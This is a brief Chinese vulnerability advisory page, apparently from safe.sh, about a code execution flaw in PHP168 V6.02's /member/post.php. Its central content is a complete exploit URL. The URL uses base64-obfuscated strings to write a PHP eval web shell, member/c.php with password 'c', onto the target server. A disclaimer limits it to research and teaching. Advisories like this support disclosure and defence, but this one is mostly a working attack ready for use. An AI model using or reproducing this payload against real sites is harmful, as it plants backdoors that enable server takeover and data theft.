| 安全风向标 |
|
 分类 |
|
|
|
|
|
| PHP168 V6.02 文件/member/post.php执行任意代码漏洞 |
|
|
影响版本:
PHP168 V6.02
漏洞描述:
PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能模块可以自由安装与删除,个人用户完全免费使用。
PHP168在某数组没有初试化,导致可以提交任意代码执行。
测试方法:
[www.safe.sh]
本站提供程序(方法)可能带有攻击性,
仅供安全研究与教学之用,风险自负!
/member/post.php?only=1&showHtml_Type[bencandy][1]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}&aid=1&job=endHTML
直接在该目录生成个member/c.php 密码为c
Safe.sh安全建议:
暂无
等待官方补丁 |
|
|
|
|
Msn: China@Safe.sh 
QQ: 7387526 Server Hosting 加入收藏
;){kind=icon}
|